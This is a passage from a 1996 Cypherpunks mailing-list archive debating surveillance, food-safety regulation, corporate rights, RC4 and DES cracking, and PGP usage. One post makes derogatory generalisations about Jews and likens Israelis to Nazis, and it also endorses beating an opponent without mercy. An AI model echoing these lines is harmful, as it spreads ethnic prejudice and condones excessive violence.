Message-ID: <v02120d09ae28692597a7@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:11 8/2/96, Deranged Mutant wrote:

>If they were asked if they minded random searches of their bags and
>belongings or required to carry photo-ID wherever they went, to be
>presented on demand, would they still be willing?

You bet. I remember a war on drugs releated poll from a few years back in
which a majority supported warrantless searches of their homes.



-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred.
   Defeat the Demopublican Unity Party. Vote no on Clinton/Dole in November.
   Vote Harry Browne for President.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sat, 3 Aug 1996 13:24:03 +0800
To: cypherpunks@toad.com
Subject: FAA to require transponders on all aircraft passengers
Message-ID: <v02120d0bae2873a00df4@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


According to KCBS, a local radio station, the FAA has closed a long
anticipated deal with a manufacturer of transponder devices. The goal of
the system to be deployed nationwide is to match aircraft passengers to
their luggage and thereby identify unaccompanied luggage on board an
aircraft.

Transponders will be affixed to all items of luggage and all passengers. If
the system discovers a transponder on the luggage in the cargo hold without
the corresponding transponder on the passenger on board, an alarm will
sound. I am not making this up.

As many of you know, I have long predicted subcutaneous transponders to
become widely deployed in the near future. First for child identification
and monitoring of criminals, then, as the children grow up, as universal
ID, driver license, proof of eligibility for employment, PIN substitute,
etc.

Today, we moved a step closer to this future.

[Note that the transponders will have to be affixed to the passenger. An
example would be a hospital style bracelet that stops working when removed.
Why embedding the transponder in a hand carried item, such as a card, will
not work is left as an exercise to the reader. Even an affixed device does
not provide perfect security. You'd really have to embed the transponder in
the body at an early age to make removal nearly impossible.]



-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred.
   Defeat the Demopublican Unity Party. Vote no on Clinton/Dole in November.
   Vote Harry Browne for President.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Sat, 3 Aug 1996 13:25:52 +0800
To: cypherpunks@toad.com
Subject: Re: SOUP KITCHENS (fwd)
Message-ID: <199608030132.UAA11308@einstein>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Fri, 2 Aug 1996 15:36:02 -0700 (PDT)
> From: Sandy Sandfort <sandfort@crl.com>
> Subject: Re: SOUP KITCHENS
> 
> A most distastful example is the complicit silence of gun stores
> when the gun grabbers regulate "kitchen table" gun dealers out of
> economic existance.

Funny, one of my customers is involved in the Texas gun lobby and through
him I am aware of literaly hundreds of people who are within a few miles of
Austin who have FFL's and have no problem selling weapons off their kitchen
table completely legal. Their prices in general are much lower than local
stores such as McBrides (the best known in Austin).

                                                 Jim Choate





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Sat, 3 Aug 1996 11:18:24 +0800
To: cypherpunks@toad.com
Subject: Re: [off-topic] roving wiretaps (fwd)
Message-ID: <199608030135.UAA11317@einstein>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Fri, 2 Aug 1996 15:23:23 -0700
> From: shamrock@netcom.com (Lucky Green)
> Subject: Re: [off-topic] roving wiretaps
> 
> The Fourth Amendment has been abolished by the Supreme Court for all
> intends and purposes. It remains listed in the Constitution for historic
> reasons only.

			       ARTICLE IV. 
 
	The right of the people to be secure in their persons, houses, 
papers, and effects, against unreasonable searches and seizures, shall 
not be violated, and no Warrants shall issue, but upon probable cause, 
supported by Oath or affirmation, and particularly describing the place 
to be searched, and the persons or things to be seized. 
 

I must agree with the above sentiment by Lucky. When Steve Jackson got
busted (I was peripheraly involved through Mentor and Bloodaxe) and the
warrant was not only sealed (ie Mentor and Bloodaxe didn't get to see it)
but it was unsigned as well when it was executed.

                                                     Jim Choate





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Sat, 3 Aug 1996 12:59:07 +0800
To: cypherpunks@toad.com
Subject: Re: A Libertine Question (fwd)
Message-ID: <199608030142.UAA11326@einstein>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Fri, 2 Aug 1996 16:50:01 -0500 (CDT)
> From: snow <snow@smoke.suba.com>
> Subject: Re: A Libertine Question
> 
>      As long as you are enforcing it on everyone, I don't think you'd have a 
> problem, but to force some one from cooking food for homeless people, and 
> allow a family barbeque, is IMO wrong.

Not at all. Businesses have no rights, individuals do. Businesses have a
responsibility to protect their patrons (if you don't think so ask all the
folks in Japan or the people here in Austin sick from Strawberries and
Blueberries they bought at the local HEB). Individuals have a right to
privacy, that includes cooking themselves food without harrassment. Business
on the other hand are selling products of potentialy questionable quality. A
reasonable person recognizes that such a business has two ways of fulfilling
its responsiblities. They can either submit to regulation and quality control
from the local municipality or else they can hang signs about their place of
business declaring "Caveat Emptor: Our food may be tainted, eat at your own
risk". Which do you think is the more reasonable?

> If it is unsafe/unsanitary to cook 
> food in a certain way, it is unsafe/unsanitary. Selective enforcement is 
> wrong. 

Not at all. I have a right to kill myself with bad cooking if I choose. I do
not have the right to kill another, especialy a stranger, without their
prior consent. I guess it would be ok if a food vendor were to ask you if
you minded being killed by their product, but I doubt many of them would be
in business next week, let alone sell many hot dogs.

People and businesses are not the same.


                                                        Jim Choate





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sat, 3 Aug 1996 14:03:48 +0800
To: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Subject: Re: AP story: Police look for Olympic bombing Internet link.
In-Reply-To: <9608030114.AA03672@ch1d157nwk>
Message-ID: <Pine.GUL.3.95.960802205338.3360E-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 2 Aug 1996, Andrew Loewenstern wrote:

> [Not From <http://www.boston.com/globe/cgi-bin/globe.cgi?ap/apnat.htm ]

"By CHARLES J. HANLEY, AP Special Correspondent"

You know, someone ought to put dossiers on these morons in a library
somewhere. 

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Sat, 3 Aug 1996 14:12:23 +0800
To: shamrock@netcom.com (Lucky Green)
Subject: Re: fbi, crypto, and defcon
Message-ID: <2.2.32.19960803040230.00ef56f4@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:28 PM 8/2/96 -0700, you wrote:

>Its up to you what you call it, but here is an interesting example:
>
>An international phone call costs about 2 cents/min to produce. The average
>rate paid for by the consumer is 62 cents. That's means the carriers mark
>up this particular product by an amazing 3000%.
>
>Can you name another business that has comparable mark-ups?

Verisign? 

InterNic Domain name registration?

Licence plates in Washington state?
---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon
                "Microsoft -- Nothing but NT promises."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Sat, 3 Aug 1996 14:07:47 +0800
To: cypherpunks@toad.com
Subject: Re: SOUP KITCHENS (fwd)
Message-ID: <199608030210.VAA11373@einstein>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Fri, 2 Aug 1996 14:10:55 -0700
> From: tcmay@got.net (Timothy C. May)
> Subject: Re: SOUP KITCHENS
> 
> (Fortunately, people survive all kinds of dirt and germs. If dogs and cats
> can eat stuff off the floor, and our ancestors did before hot water, soap,
> and autoclaves, then so can we. Not to mention children. But I digress.)

True enough, but not the whole story. If a dog or cat is kept well and fed
good quality food they live 10+ years. The average life of an animal on the
street is between 2-5 years. As to people, we now live around 75-80 years,
prior to all these rules and regulations on food and such the average was
20-25. If we go back to what you propose you would be dead a long time ago.

> The use of zoning and health code ordnances to harass certain classes of
> people is nothing new. Like I said, the Boy Scout Cookout and similar
> "good" events are not bothered by City Inspectors descending on them to
> shut them down.

In my experience they don't get hassled because they get the requisite
permits and act in good faith. Many of these small businesses and street
vendors are 'hassled' because they are unwilling or unable to meet basic
commen sense standards of conduct and go out of there way to circumvent
regulations and in some cases commen sense. I have a friend who worked at a
local strip club on N. Lamar (Yellow something...) up until a few weeks ago.
Seems one of the workers there turned a freezer off and as a result some
meat was tainted. Did they throw it out? Hell no, they went ahead and served
it because to do othewise would effect their profit margin. My (and by
extension your) life is not worth a few measly bucks. My friend complained
bitterly and when they went ahead and did it he quit and filed a complaint
with the local health dept. (I am completely unaware of the result but the
club is still open). I once got food poisoning from a Vietnamese food vendor
on the West Mall at UT Austin and complained and called the Health Dept.
Last time I was down on The Drag (the popular name of the street) the same
vendor was still in business and this was over 10 years later. And for the
record I have bought food there, I have just become more careful about its
taste and quality.

> Further, in time past the operation of a "street food" service (hot dogs,
> ice cream, various knoshing items, etc.) was a way for otherwise poor
> persons to start a business. My own city, Santa Cruz, has no pushcart
> vendors, and only one officially-approved sidewalk hotdog vendor. A loss
> for us, a loss for would-be vendors, and with no gain in "food safety" that
> I can plausible see.

Why do they prohibit permits for these types of businesses?

> I actually think this shows another side of the harassment of food
> giveaways and low-cost vendors: it cuts down on competition with the
> established food entities. While I tend to dismiss "corporate conspiracy"
> theories about how Giant Corporations are repressing and suppressing the
> Little Guys, there is little doubt that licensing, zoning, and other
> governmental restrictions are often used by established entities to keep
> out competition. Licenses get used for what economists call "rent-seeking"
> behavior.

You should be more careful about who you pick to represent you then when you
vote. Here in Austin back in the 80's the big thing was to move the airport
out of town. So many of the public officials rushed out and bought land near
the little town outside Austin in the hopes that the airport would be moved
there. It was so bad we had many elections where the citizenry voted not to
move the airport and the city council went ahead with the actions anyway.
Finaly a few years ago the feds closed Bergston the local airbase and the
entire rationale for moving the airport fell through and now all those
people have retired from local political actions because they are all broke.

> (Examples abound in other areas, too, such as where large chip companies
> like Intel actually relish the vast amounts of paperwork they are required
> to fill out, becuase this overhead and legal burden can be handled by their
> buildings full of paper pushers, but helps to keep small companies from
> entering the market. Intel has actually insisted that small companies file
> the same environmental impact reports, labor reports, etc., that they have
> to fill out. Understandable at one level, but also an example of using "the
> system" to put pressure on upstarts. Or, the rent-seeking of professional
> guilds, well-known to all of us.)

I personaly find it reassuring that some bunch of knuckle-heads are unable
to start a chip making facility like you support. The thought of finding
flourine compounds in the local river (where I get my tap water) or simply
dumped in the air is a little unsettling. Just because some group of bozo's
want to start a business is not sufficient justification for that to be
allowed.

It seems to me that many of the folks who recognize downsized workers pleas
for their 'right to a job' as so much bunk are at the same time supporting a
businesses right to start up. A pretty humorous double standard.

Persons don't have a right to work and businesses do not have a right to
start up unless they can meet reasonable levels of responsibility for their
actions. People and by extension businesses do not have the right to harm
others without their prior consent. As an extension of this, people have a
right to limit the ways and means that a business may use in order to operate.

> As to Alan Horowitz's bizarre notion that "public streets" are not to be
> used for giving away food,

I have never heard of anyone being arrested for giving away food, only
selling it without a license. I bet the Salvation Army soup kitchen would be
worried if this claim were true (they aren't and it ain't).

> does he believe the same to be true of giving
> away speech, giving away ideas, passing books to other people, etc.? "There
> are bookstores for selling or buying books, and anyone who engages in this
> sort of action on a public street will have his attitude adjusted with my
> billy club."

I am unaware of any municipality which prohibits giving away books, they
regulate bookstores because they are a business and engaged in commerce.
If you are aware of a municipality (or any list reader for that matter) I
would appreciate being informed (ie mail me privately).

> "Public" areas cause problems for analysis of rights, I will grant. The
> "commons problem" is well known. But I think that the specific cases we've
> been discussing, of whacking bums with nightsticks for the crime of not
> maintaining "proper decorum," and of Food Not Bombs being shut down while
> the Boy Scouts are not, are clear cases where the law is being misapplied.

And your argument that a business should have the same rights and
considerations as a human being is bogus. If that were true then by extensio
governments would have rights, which they don't. Unless you breath and shit
you don't have rights, only duties and responsibilities assigned by the
persons who built the system. A structure is not equivalent by any stretch
of the imagination as the person(s) who built it.


                                                  Jim Choate





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Sat, 3 Aug 1996 14:07:56 +0800
To: cypherpunks@toad.com
Subject: Re: More evidence that democracy is bunk
In-Reply-To: <v02120d09ae28692597a7@[192.0.2.1]>
Message-ID: <199608030410.VAA16970@netcom9.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Lucky Green wrote:

> At 3:11 8/2/96, Deranged Mutant wrote:
> 
> >If they were asked if they minded random searches of their bags and
> >belongings or required to carry photo-ID wherever they went, to be
> >presented on demand, would they still be willing?

> You bet. I remember a war on drugs releated poll from a few years 
> back in which a majority supported warrantless searches of their homes.

RAW was fond of pointing out that in spite of the current love of
democratic government, free societies are actually infrequent and
short-lived blips on the historical landscape.  

Something about basic human nature and "all you have to do is rock 
the boat a little and the people will beg the government to take their
rights away."

Since the government is usually in the best position to do any 
necessary cage-rattling, perpetual freedom is an illusory concept. 

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 3 Aug 1996 14:27:26 +0800
To: cypherpunks@toad.com
Subject: Re: fbi, crypto, and defcon
Message-ID: <199608030426.VAA19121@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:20 AM 8/1/96 -0800, jim bell <jimbell@pacifier.com> reminded us:
>Also:  Clipper was fabbed by VLSI Technology.  A few pointed inquiries might 
>work wonders here.

It was made by Mykotronx, using tamperproof programmable gate 
array chips from VLSI, though I don't remember whether they were
entirely programmed at Mykotronx+NSA, or whether they were
mostly mask-programmed at VLSI first.

On the other hand, if you _want_ to make a DES-cracker,
at the time Clipper came out, VLSI was making a 192Mbps DES chip,
and they may have faster stuff now.
#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	Rescind Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hallam-Baker <hallam@ai.mit.edu>
Date: Sat, 3 Aug 1996 13:06:15 +0800
To: cypherpunks@toad.com
Subject: Re: VISA Travel Money
In-Reply-To: <4tmr8j$lrg@life.ai.mit.edu>
Message-ID: <3202AC0F.41C6@ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May wrote:

> I'm also skeptical of these "VISA Travel Money" cards. That is, they don't
> seem to be too useful for anything.

They are usefull for the one purpose for which they are designed. One
can go off to a foreign country and obtain cash as required without
having to pay often usurous fees from bureaux de change. Just because
you are supposed to be able to use travel cheques as cash does not mean
that you really can.

> After all, cash works well. (It's rarely stolen, in my experience, or at
> least this is not a major concern. Traveller's checks work well, and can be
> "cashed" into the local currency. ATM machines fill the same function these
> "VISA Travel Money" cards apparently do; at least when I was in Europe the
> last time this is what I used, and my French francs were as untraceable as
> could be.
>
> As I see it, yet another marketing solution looking for a problem.

Its not a major VISA product but it is reasonably usefull. Its more convenient
to carry a card than cash. If one gets mugged or looses the card there
is a way of recovering the cash (sometimes). I don't think that there would
be much use for such cards in the tourist belt but you might well want to
have one if you were going on a trip to the hinterlands of a country.

For most people VISA travel cheques or a cash advance is likely to be
more usefull. 
 
> A real step would be a true privacy card, a card issued in a jurisdiction
> unfriendly to U.S. investigators and offering various transaction-blinding
> options. I have to wonder what pressures have been put on the major credit
> card companies...

See the Stored Value Card work that VISA have been working on, or MONDEX.
MONDEX has almost every feature you would want from anonymous cash except 
you can't prove its anonymous. You can do purse to purse transfers 
however.

Its a different level of privacy to that of e-cash. e-cash provides
only purchaser unlinkability and its an online scheme. MONDEX makes
it possible to trace certain withdrawal and deposit patterns of a user
but little else. 


		Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sat, 3 Aug 1996 14:36:27 +0800
To: Jim Choate <ravage@EINSTEIN.ssz.com>
Subject: Re: SOUP KITCHENS (fwd)
Message-ID: <v02120d0fae28834ebce8@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 21:10 8/2/96, Jim Choate wrote:

>In my experience they don't get hassled because they get the requisite
>permits and act in good faith. Many of these small businesses and street
>vendors are 'hassled' because they are unwilling or unable to meet basic
>commen sense standards of conduct and go out of there way to circumvent
>regulations and in some cases commen sense.

Jim,
I was there when Food Not Bombs got busted in San Francisco. They tried to
get a permit from the Health Department, but the HD refused to even process
the application. FNB finally won the case. I guess next time the HD will be
smarter, process the application and deny it. At present, SF has a
hands-off policy in regards to Food Not Bombs.

The feeding was never the real issue. The heavy political indoctrination
that came with it was. Patrick McHenry handed out the food, screaming in a
mike, in front of the Federal Building (without interfering with
pedestrians in any way) as the Feds came out on their lunch hour, having to
listen to him complain about President Bush's CIA background, calling Bush
a drug dealer, and demanding to know why there was no money for food when
there was plenty of money for nukes.

Now can we please let this thread (at least on the list) die?



-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred.
   Defeat the Demopublican Unity Party. Vote no on Clinton/Dole in November.
   Vote Harry Browne for President.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JMKELSEY@delphi.com
Date: Sat, 3 Aug 1996 13:04:22 +0800
To: cypherpunks@toad.com
Subject: Paranoid Musings
Message-ID: <01I7TCONUR6G8Y5AIP@delphi.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

[ To: cypherpunks ## Date: 08/02/96 12:29 pm ##
  Subject: Paranoid Musings ]

>Date: Tue, 30 Jul 1996 11:13:59 -0700
>From: frantz@netcom.com (Bill Frantz)
>Subject: Paranoid Musings

>Sometimes paranoia strikes.  Since these musings are crypto related,
>I thought I would share them.

>Now expensive specialized cracking equipment can certainly speed up
>the process, but there may be a better way.  If cryptanalysis of RC4
>yields techniques which make the process much easier, then it is the
>ideal cypher to certify for export.

Actually, this makes sense for another reason.  Academic
cryptanalysis is often about finding any attack on a cipher that's
easier than keysearch, even if the requirements for that attack are
still completely impractical.  (Differential and linear attacks on
DES are a good example of this.)  However, if you're interested in
actually recovering data in your attacks with high probability and
low cost, then it makes sense to focus on protocol and
implementation weaknesses, and then on attacks like keysearch which
can be done with either ciphertext-only or known-plaintext.

I would guess that some of NSA's best people work on optimizing
keysearches.  This especially makes sense because of the widespread
use, first of DES, and more recently of exportable 40-bit ciphers
like RC2 and RC4.

>The paranoid conclusion is that there is a significant weakness in
>RC4.

The paranoid conclusion is that there is a significant weakness in
any cipher you're counting on.

>Bill Frantz       | Cave ab homine unius lebri | Periwinkle -- Consulting
>(408)356-8506     |  [Beware the man of one    | 16345 Englewood Ave.
>frantz@netcom.com |   book]  - Anonymous Latin | Los Gatos, CA 95032, USA

   --John Kelsey, jmkelsey@delphi.com / kelsey@counterpane.com
 PGP 2.6 fingerprint = 4FE2 F421 100F BB0A 03D1 FE06 A435 7E36

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMgI7X0Hx57Ag8goBAQEsNAQAm6SbOnCkTh2EByH8Oa1GoTItx+JUE2hA
mtEDp//VW1qH5Lzem14ARGbcgIHbPQqVHN355p5pSrH7tI+RnPc45RRjmF6Ot96r
CjnOz3DWPOXx30pm4NGchKs3MmfMyeDKvL3GofMZee8qNm8IZsnMuLMhQABUIdBM
kU/oaYwfZdE=
=C9ip
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul Wittry <ppw3@everett.com>
Date: Sat, 3 Aug 1996 15:35:10 +0800
To: cypherpunks@toad.com
Subject: Why Fingerprints and Key-ID's
Message-ID: <199608030439.VAA00131@post.everett.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Cypherpunks,

I understand PGP Open-Signed messages and why they are used. I've 
read all the FAQ's. I can't seem to figure out why some of us put our 
Fingerprints and/or Key-ID's at the end of messages.

The answer to my question is probably in a FAQ somewhere and I'm 
missing it, I learn best by watching (visually) or by doing 
(experientially) so I'm having a little trouble learning from 
documentation.

In any case, if someone would spend a little time to explain, or 
point me in the right direction, I would be grateful.

Thanks,
Paul

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMgLPl8498OZoTL5VAQFcrwP+JNK8K0cQFdU8+//GQQvj2Z3hn7gTgTeH
SRHosvwj5xNmR5pB9h8FlQillZ+OQEeEF+/z75+fqyK9AD68i+F0c0bymj1vJ6zR
zQnjUsIh/VBKLAvrmnmf08E4uWo2wdJrsjBtRkvShmMWHOBxsp5dReDrsVNPRHtK
Pp1zqTLUBpk=
=1kJ1
-----END PGP SIGNATURE-----
___________________________________________________________________________
Paul Wittry, Visual Artist, Philosopher, Poet|"A poet is a dethroned king
Internet:<ppw3@everett.com> <bi065@scn.org>  |sitting among the ashes of
Homepage:<http://www.everett.net/users/ppw3> |his palace trying to form an
PGP Public Key=Finger:<ppw3@everett.com>     |image from out of the ashes."
Please, encrypt your messages!!!!            |_______________Kalil Gibran__

 


            
                                             





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Sat, 3 Aug 1996 12:49:52 +0800
To: cypherpunks@toad.com
Subject: Re: "adjust your attitude with their billy club" (fwd)
Message-ID: <199608030251.VAA11455@einstein>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Fri, 2 Aug 1996 11:48:45 -0400 (EDT)
> From: Alan Horowitz <alanh@infi.net>
> Subject: Re: "adjust your attitude with their billy club" (fwd)
> 
> <<  9th & 10th AMendments to the Conmstitution >>
> 
> Cute, you left out the Third.


			       ARTICLE III. 
 
	No Soldier shall, in time of peace be quartered in any home 
without the consent of the Owner, nor in time of war, but in a manner to 
be prescribed by law. 
 
I didn't include it because it isn't germane to the discussion at hand.
 
> We are referring to the Sovereign power of the State of Washington to 
> allocate to the municipality of Seattle, a general Police Power to 
> maintain the Peace.  Every lawyer seems to think that Seattle has the 
> power to forbid people from using sidewalks as latrines and kitchen sinks.

I agree with the municipality, if you want to eat your own shit and piss go
right ahead. You have no right to expose me to the deliterious health effects
of such material randomly sprayed around my city. Hell, even animals are smart
enough to know not to shit in their own bed. Pitty all these smart people seem
to have forgotten such a basic rule of nature. Such actions are clearly a
threat to my person and property.

> I am in bed with the government, so I have better knowledge than most of 
> the people on this list, about how bad it is. Nonetheless, I recall the 
> aphorism from the Talmud: "Pray for the health of the government, lest 
> the people eat other alive".

If these sayings indicate such insight how come the Jews have such a
terrible time getting along with anyone for any length of time? Why does
their current regime have such a hard time? Why is it that I get such a
rising in the hackles on my neck when I am reminded that it is illegal in
Isreal to carry a Palestinian flag in public. How come they begin to look
more and more like the new age nazi's? The Isrealis love of government and
structure has certainly not brought them great amounts of security, wealth,
or friends.

> If you want to walk into the public library after a six-month moratorium 
> on bathing - well, the courts are divided on this, but _I_ stand for the 
> proposition that this is an assault on the other patrons and I will lobby 
> _my_ city councilman for there to be rules against it.

I will oppose it. While I would oppose those self same persons from touching
me or my property without my prior permission (which I would not give) I
would not prohibit them from entering any public facility. I oppose Austin's
recent ruling prohibiting sleeping in public parks and other area because
the local businesses said it effected their profits. I oppose their recent
ruling that ALL persons who ride a bike MUST wear a helmet, ostensibly to
protect children even though the law doesn't mention minors at any point.
The mayor when queeried on this point simply ignored it. I assure you none
of them will get my vote, and from what I have seen not a lot of others
either.

> But if you want to play your boombox loud near me, make damn sure you do
> it behind soundproof walls. Where I live, the cops will respond to that 
> kind of complaint and shut down the nuisance, with nightsticks if need be 
> (in my little rural area, it's seldom necessary). Maybe you California or 
> NYC folks don't have police forces that will mitigate nuisances. Enjoy 
> your progressive radical-chic neighborhood, folks.

Unless you can demonstrate that your person or property are harmed by the
action I oppose such laws. Simply smelling bad is not a physical act. Austin
has a law which basicaly does the same thing. In general the people of the
city don't like it, the police don't enforce it, and the people drive around
town jammin' to their hearts content. If my apartment neighbor is playing
their radio too loud I am not going to call the cops I am going to call the
manager if my attempts at becoming some sort of aquaintence fail at mediation.
It is private property and short of violence to a person or property they
have no business in here without a warrant. I own 5 acres near Lockhart, just
outside Austin, and I have made it clear to several of the county mounties
that parking in my driveway is verbotten if they don't have a warrant for
searching my property, they liked to park there to eat food and fill out
reports. They seem to understand and respect my wishes. They now park down
at the intersection of my dirt road and 71 on public land.

The right to freedom of speech means you have a right to be offended and to
offend. If you haven't been offended at least once a day you need to get out
of your apartment and quit watching the roaches crawl the walls. If what is
on television offends you then start your own television station and play
family (or porno) material till your hearts content. Passing laws that tell
privately owned stations what to air is wrong because it is equivalent to
limiting the freedom of speech and press. This can be extended to all such
prior restraint laws. To regulate content based on the public airwaves model
is equivalent to the state telling me what station to listen to on my car
radio because I am on a public road.

When I was a small child I learned an important lesson the hard way. I was
smaller than the other kids so they would call me names and pick on me to no
end. Did I fight with them? No, I recognized even at that young age that
violence would not stop the actions, only change their nature. Violence as a
means of coersion is a signal of a small mind. On the other hand, I only lost
a single fight in the 1st grade. This taught me that if one is attacked in a
physical sense respond with all the force and violence you can muster, show
no mercy until the beggar is on the ground and in a sorry state. Don't stop
if they say they surrender, they may be saying it to gain a tactical
advantage. Stop only when you are certain they no longer have the will or
means to carry the fight further. It would be a great thing if our
government and society in general would learn this lesson regarding violence.
We would live in a much less violent world.

                                                      Jim Choate





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Sat, 3 Aug 1996 15:44:43 +0800
To: Jim Choate <ravage@EINSTEIN.ssz.com>
Subject: Re: A Libertine Question (fwd)
In-Reply-To: <199608030308.WAA11470@einstein>
Message-ID: <Pine.SUN.3.91.960802214751.29048A-100000@crl5.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Fri, 2 Aug 1996, Jim Choate wrote:

> And any insurance company with a whit of sense would charge you rates so
> high that your much touted small vendors and many of the medium sized
> vendors currently in business would not exist. You think governments are
> bad? Wait till you see a bunch of bean counters racing a profit margin. In
> such a situation we wouldn't even have the opportunity for input into the
> system via constitutions, charters, and votes. Just imagine how much support
> a Japanese insurance company would provide its clients in regards to the
> current epidemic in Japan, absolutely none because it is better the little
> vendor go out of business than the insurance company.

Apparently Jim does not understand that the "race for profit 
margin" is what LOWERS the prices of goods and services.  You 
might check out HUMAN ACTION by von Mises.  Anyway, as I said in 
my previous post.

> > It would be nice if businesses were offered that choice

I'm confident that the market solution would be far cheaper and
less violent they injecting the coercive state apparatus into a
volutary transactions between PEOPLE.

> I own 2 businesses...none are equivalent to my person. 

So?  They are owned and operated by people.

> Businesses are a system of rules and procedures...

Made and enforced by PEOPLE.  Jim is begging the question.

> Would you seriously give my dog a vote?

Gee, I don't know your dog.  His understanding of economics
couldn't be much more rudimentary.  (Okay, it was a cheap
shot, but it was a silly question.)


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Sat, 3 Aug 1996 14:07:04 +0800
To: cypherpunks@toad.com
Subject: Re: A Libertine Question (fwd)
Message-ID: <199608030308.WAA11470@einstein>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Fri, 2 Aug 1996 19:09:25 -0700 (PDT)
> From: Sandy Sandfort <sandfort@crl.com>
> Subject: Re: A Libertine Question (fwd)
> 
> > A reasonable person recognizes that such a business has two ways
> > of fulfilling its responsiblities. They can either submit to
> > regulation and quality control from the local municipality or
> > else they can hang signs about their place of business declaring
> > "Caveat Emptor: Our food may be tainted, eat at your own risk".
> > Which do you think is the more reasonable?
> 
> It would be nice if businesses were offered that choice.  I would
> choose the second, myself.  Only my sign would say, "Our food is
> guaranteed not tainted by the Acme insurance company, not some
> corrupt government."  The problem is, governments do not allow 
> businesses nor consumers to make that sort of choice.  With them 
> it's, "my way or the highway" (or harassment and jail actually).

And any insurance company with a whit of sense would charge you rates so
high that your much touted small vendors and many of the medium sized
vendors currently in business would not exist. You think governments are
bad? Wait till you see a bunch of bean counters racing a profit margin. In
such a situation we wouldn't even have the opportunity for input into the
system via constitutions, charters, and votes. Just imagine how much support
a Japanese insurance company would provide its clients in regards to the
current epidemic in Japan, absolutely none because it is better the little
vendor go out of business than the insurance company.

> Until Jim shows me a business that isn't owned and operated by
> people, I'll have to respectfully disagree.  Businesses are just
> people acting alone or in concert.  Actions are what count, not
> whether the action is of a pecuniary nature or not.

I own 2 businesses (CyberTects & Linux System Development Labs) and work for
another (Tivoli - IBM), none are equivalent to my person. Businesses are a
system of rules and procedures that one offers another person in exchange for
some other commodity. Saying a business has the same rights as a person is
equivalent to saying the Empire State Bldg. has civil rights because persons 
built it and occupy it. My dog has a better argument for civil rights than
any business, it breaths and shits. Would you seriously give my dog a vote?
I shure won't, and I won't support any business with rights.

                                                 Jim Choate





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 3 Aug 1996 12:53:18 +0800
To: cypherpunks@toad.com
Subject: Re: Corporate e-mail policy
In-Reply-To: <199608022351.SAA14955@manifold.algebra.com>
Message-ID: <q4B3RD7w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


